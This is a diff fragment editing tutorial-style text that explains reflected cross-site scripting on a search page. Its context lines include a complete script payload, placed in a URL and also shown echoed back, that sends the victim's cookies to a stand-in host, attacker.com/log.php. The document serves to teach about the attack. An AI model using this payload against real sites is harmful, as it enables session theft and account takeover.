 You searched for "data breach":

-If the Search functionality is vulnerable to a reflected cross-site scripting vulnerability, the attacker can send the victim a link such as the below:
+If the Search functionality is vulnerable to a reflected cross-site scripting vulnerability, the attacker can send the victim a malicious URL such as the below:

 https://example.com/news?q=<script>document.location='https://attacker.com/log.php?c=' + encodeURIComponent(document.cookie)</script>

-Once the victim clicks on the link, the website will display the following:
+Once the victim clicks on the malicious URL, the XSS attack is executed and the website displays the following:

 You searched for "<script>document.location='https://attacker.com/log.php?c=' + document.cookie</script>":